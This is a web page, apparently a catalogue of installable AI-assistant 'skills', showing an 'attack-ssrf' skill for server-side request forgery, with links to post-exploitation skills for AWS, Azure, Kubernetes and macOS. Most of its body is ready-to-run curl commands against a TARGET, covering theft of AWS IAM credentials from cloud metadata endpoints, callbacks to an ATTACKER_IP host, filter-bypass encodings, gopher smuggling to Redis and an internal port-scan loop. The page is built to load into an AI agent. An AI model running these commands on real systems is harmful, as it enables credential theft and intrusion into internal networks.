メニュー
Server-Side Request Forgery — internal network access, cloud metadata theft, filter bypass techniques
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
SOC 職業分類に基づく
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-ssrf |
| description | Server-Side Request Forgery — internal network access, cloud metadata theft, filter bypass techniques |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["ssrf","web","injection","cloud","attack"] |
| tech_stack | ["web","aws","gcp","azure"] |
| cwe_ids | ["CWE-918"] |
| chains_with | ["attack-xxe","attack-ssti"] |
| prerequisites | [] |
| severity_boost | {"attack-xxe":"SSRF via XXE parser = file read + internal network scanning","attack-ssti":"SSRF from SSTI = full RCE chain"} |
Force the server to make requests to internal resources, cloud metadata endpoints, or attacker-controlled servers.
Look for parameters that accept URLs:
# Start callback listener
attack_script ssrf_listener -p 8888 -o ssrf_evidence.json &
# Test URL parameters
curl "https://TARGET/api/fetch?url=http://ATTACKER_IP:8888/ssrf-test"
curl "https://TARGET/api/preview?link=http://127.0.0.1:80"
# AWS IMDSv1
curl "https://TARGET/fetch?url=http://169.254.169.254/latest/meta-data/"
curl "https://TARGET/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# GCP
curl "https://TARGET/fetch?url=http://metadata.google.internal/computeMetadata/v1/"
# Azure
curl "https://TARGET/fetch?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Decimal IP (127.0.0.1 = 2130706433)
curl "https://TARGET/fetch?url=http://2130706433/"
# Hex IP
curl "https://TARGET/fetch?url=http://0x7f000001/"
# IPv6
curl "https://TARGET/fetch?url=http://[::1]/"
# URL encoding
curl "https://TARGET/fetch?url=http://%31%32%37%2e%30%2e%30%2e%31/"
# DNS rebinding (use your own DNS server)
curl "https://TARGET/fetch?url=http://rebind.127.0.0.1.nip.io/"
# Redirect bypass
curl "https://TARGET/fetch?url=http://ATTACKER/redirect?to=http://169.254.169.254/"
# Protocol smuggling
curl "https://TARGET/fetch?url=gopher://127.0.0.1:6379/_INFO"
# Scan common internal ports
for port in 80 443 8080 8443 3306 5432 6379 27017 9200 11211; do
curl -s -o /dev/null -w "%{http_code}" "https://TARGET/fetch?url=http://127.0.0.1:$port/" &
done
wait
| Finding | Severity |
|---|---|
| Cloud metadata access (credentials) | Critical (P1) |
| Internal network access | High (P2) |
| Out-of-band HTTP callback | Medium (P3) |
| Blind SSRF (timing-based) | Medium (P3) |
| File read via file:// protocol | Critical (P1) |
| gopher:// protocol access | High (P2) |
attack_script ssrf_listener — OOB callback listenercurl — manual SSRF testing